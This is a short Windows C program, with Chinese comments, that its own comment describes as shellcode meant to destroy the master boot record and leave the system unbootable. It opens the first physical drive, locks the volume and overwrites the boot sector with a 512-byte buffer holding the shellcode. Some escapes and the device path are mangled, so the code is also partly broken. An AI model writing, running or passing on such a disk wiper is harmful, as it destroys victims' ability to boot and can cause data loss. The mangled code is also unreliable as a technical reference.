#include <Windows.h> 
#include <stdio.h> 
 
//shellcode隨便寫了點 能破壞MBR,無法進入系統 
unsigned char   scode[]= 
    "/xb8/x12/x00" 
    "/xcd/x10/xbd" 
    "/x18/x7c/xb9"; 
 
DWORD writeMBR() 
{ 
    DWORD dwBytesReturned; 
    BYTE pMBR[512]={0}; 
 
    //將破壞代碼寫入變量pMBR 
    memcpy(pMBR, scode, sizeof(scode)); 
    pMBR[510]=0x55; 
    pMBR[511]=0xaa; 
 
    //打開物理磁盤 
    HANDLE hDevice = CreateFile("////.//PhysicalDrive0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); 
    if (hDevice == INVALID_HANDLE_VALUE) 
    { 
        printf("createfile failed..."); 
        return -1; 
    } 
 
    //鎖定卷，使用FSCTL_LOCK_VOLUME時，以下有幾個參數設為NULL,0; 
    /*Parameters
    hDevice
    A handle to the volume to be locked. To retrieve a device handle, call the CreateFile function. 
 
    dwIoControlCode
    The control code for the operation. Use FSCTL_LOCK_VOLUME for this operation. 
 
    lpInBuffer
    Not used with this operation; set to NULL.
 
    nInBufferSize
    Not used with this operation; set to zero.
 
    lpOutBuffer
    Not used with this operation; set to NULL.
 
    nOutBufferSize
    Not used with this operation; set to zero.
 
    lpBytesReturned
    A pointer to a variable that receives the size of the data stored in the output buffer, in bytes. */ 
 
 
    DeviceIoControl(hDevice, FSCTL_LOCK_VOLUME, NULL, 0, NULL, 0, &dwBytesReturned, NULL); 
    //寫入磁盤文件  
    WriteFile(hDevice, pMBR, 512, &dwBytesReturned, NULL); 
    DeviceIoControl(hDevice, FSCTL_UNLOCK_VOLUME, NULL, 0, NULL, 0, &dwBytesReturned, NULL); 
    return 0; 
} 
 
int main(int argc, char* argv[]) 
{ 
    writeMBR(); 
    return 0; 
}